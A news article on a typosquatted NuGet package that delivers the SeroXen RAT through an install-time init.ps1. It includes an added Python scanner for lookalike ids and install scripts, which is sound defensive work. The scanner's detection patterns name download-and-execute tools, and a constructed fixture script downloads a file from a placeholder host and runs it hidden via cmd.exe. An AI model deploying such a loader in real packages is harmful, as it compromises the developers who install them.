A malicious package has been found on the NuGet package manager, the package repository for the .NET Framework, in a discovery that again highlights the fragility of the software supply chain.
The package masquerades as legitimate by using the deceptively similar name “Pathoschild.Stardew.Mod.Build.Config.”
It came to light because a remote access trojan (RAT), known as SeroXen RAT, is concealed within it.
What is SeroXen?
SeroXen RAT is a commercially available fileless RAT, obtainable for a mere $60 for a lifetime subscription, making it disturbingly accessible to cybercriminals. This malicious tool combines the functionalities of the Quasar RAT, the r77 rootkit, and the Windows command-line tool NirCmd.
More Details
The genuine package, Pathoschild.Stardew.ModBuildConfig, has garnered nearly 79,000 downloads, indicating its popularity among developers.
In stark contrast, the malicious variant has had its download count artificially inflated since its publication on October 6, 2023, and now exceeds 100,000 downloads.
The account behind this malicious package, operating under the name “Disti,” has also released six additional packages, collectively amassing over 2.1 million downloads.
Four of these packages pose as libraries for various cryptocurrency services, including Kraken, KuCoin, Solana, and Monero.
Beneath that cover, however, their true purpose is to deliver the SeroXen RAT.
Initiation Points
The attack chain starts during the package’s installation, through a script named “init.ps1,” which lets the package execute code without triggering any warnings.
JFrog had previously disclosed this method in March 2023, when it was exploited to retrieve subsequent-stage malware.
Although deprecated, the “init.ps1” script is still recognized by Visual Studio and runs without any warnings, and an attacker can insert arbitrary commands into it.
In the analyzed package, this PowerShell script is used to fetch a file named “x.bin” from a remote server. That file is actually a heavily obfuscated Windows Batch script, which in turn constructs and executes another PowerShell script.
Ultimately, this chain of actions culminates in deploying the SeroXen RAT.
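The two warning signs described above, a lookalike package id and an install-time “init.ps1,” can both be checked before a package is ever restored. The script below is an added example written for this article; it is not code from the original post, from JFrog, or from the NuGet project. It assumes only the NuGet packaging conventions that a .nupkg is a zip archive, that its metadata is an embedded .nuspec, and that install-time PowerShell scripts live under tools/. The indicator patterns, the trusted-id list, and the two package fixtures (including the short download-and-execute script used to exercise the detector) are constructed for the example and are not the real package’s contents.

```python
"""Pre-restore check for a .nupkg: lookalike id and install-time PowerShell indicators."""
import io
import re
import zipfile
from xml.etree import ElementTree

# Indicators a defender expects in a download-and-execute loader (constructed list).
SUSPICIOUS_PATTERNS = {
    "remote_download": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|\bcurl\b", re.I),
    "dynamic_execution": re.compile(
        r"Invoke-Expression|\biex\b|Start-Process|cmd(?:\.exe)?\s*/c", re.I),
    "encoded_payload": re.compile(r"-enc(?:odedcommand)?\b|FromBase64String", re.I),
}

# Package ids the team trusts; any id that collapses to the same form is a lookalike.
TRUSTED_IDS = ["Pathoschild.Stardew.ModBuildConfig"]


def normalize_id(package_id):
    """Drop the separators and case that typosquats play with."""
    return re.sub(r"[.\-_]", "", package_id).lower()


def lookalike_of(package_id, trusted_ids=TRUSTED_IDS):
    """Return the trusted id this one imitates, or None if it is trusted or unrelated."""
    if package_id in trusted_ids:
        return None
    norm = normalize_id(package_id)
    for trusted in trusted_ids:
        if norm == normalize_id(trusted):
            return trusted
    return None


def scan_script(text):
    """Return the names of the indicators that fire on one PowerShell script."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(text)]


def scan_nupkg(nupkg_bytes):
    """Inspect an in-memory .nupkg: read the id from the .nuspec, scan every tools/*.ps1."""
    findings = {"id": None, "lookalike_of": None, "scripts": {}}
    with zipfile.ZipFile(io.BytesIO(nupkg_bytes)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower.endswith(".nuspec"):
                root = ElementTree.fromstring(zf.read(name))
                # .nuspec files carry a versioned namespace, so match on the local tag name.
                for el in root.iter():
                    if el.tag.split("}")[-1] == "id":
                        findings["id"] = (el.text or "").strip()
                        break
            elif lower.startswith("tools/") and lower.endswith(".ps1"):
                text = zf.read(name).decode("utf-8", errors="replace")
                findings["scripts"][name] = scan_script(text)
    if findings["id"]:
        findings["lookalike_of"] = lookalike_of(findings["id"])
    return findings


def is_suspicious(findings):
    """Flag the package if its id imitates a trusted one or any install script fires."""
    return findings["lookalike_of"] is not None or any(findings["scripts"].values())


def build_nupkg(files):
    """Build a minimal .nupkg in memory from {path: text}; used only for fixtures."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, content in files.items():
            zf.writestr(path, content)
    return buf.getvalue()


def nuspec(package_id):
    """Smallest .nuspec that carries an id (constructed fixture metadata)."""
    return ('<?xml version="1.0"?>'
            '<package xmlns="http://schemas.microsoft.com/packaging/2013/05/nuspec.xsd">'
            f'<metadata><id>{package_id}</id><version>1.0.0</version>'
            '<authors>fixture</authors><description>fixture</description></metadata></package>')


# Constructed fixture: a genuine-style package with a library and no scripts.
BENIGN_PKG = build_nupkg({
    "Pathoschild.Stardew.ModBuildConfig.nuspec": nuspec("Pathoschild.Stardew.ModBuildConfig"),
    "lib/net45/placeholder.dll": "",
})

# Constructed fixture: lookalike id plus an init.ps1 that fetches and runs a remote blob.
# Placeholder URL and a generic pattern, not the real package's script.
LOOKALIKE_PKG = build_nupkg({
    "Pathoschild.Stardew.Mod.Build.Config.nuspec": nuspec("Pathoschild.Stardew.Mod.Build.Config"),
    "tools/init.ps1": (
        "param($installPath, $toolsPath, $package, $project)\n"
        "$f = Join-Path $env:TEMP 'x.bin'\n"
        "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.bin', $f)\n"
        "Start-Process cmd.exe -ArgumentList '/c', $f -WindowStyle Hidden\n"
    ),
})

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN_PKG), ("lookalike", LOOKALIKE_PKG)):
        result = scan_nupkg(pkg)
        print(label, "suspicious" if is_suspicious(result) else "clean", result)
```

The id check deliberately compares normalized forms rather than exact strings, because the separators are exactly what the fake id manipulated; a real deployment would load the trusted list from the project's lock file or an allow-list rather than hard-coding it, and would treat any package that ships a tools/ script as worth a manual look even when no pattern fires, since the patterns only catch loaders that are not yet obfuscated.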
This incident underscores the persistent exploitation of open-source ecosystems and the developers who rely on them by malicious actors.
What’s the Way Forward?
The challenges of cybersecurity today are increasingly complex, and they are bound to become more intricate still.
The discovery of a malicious NuGet package targeting .NET developers highlights the persistent need for vigilance in software supply chain security.
As technology advances, we are urged to invest proactively in robust cybersecurity measures and to stay attuned to emerging threats.
Quantum computing and AI hold incredible promise but demand meticulous attention to security and ethical considerations.
Tomorrow’s landscape will require a delicate balance between innovation and safeguarding data privacy.
Also, embracing eco-friendly technology underscores the convergence of sustainability and security in shaping our digital future.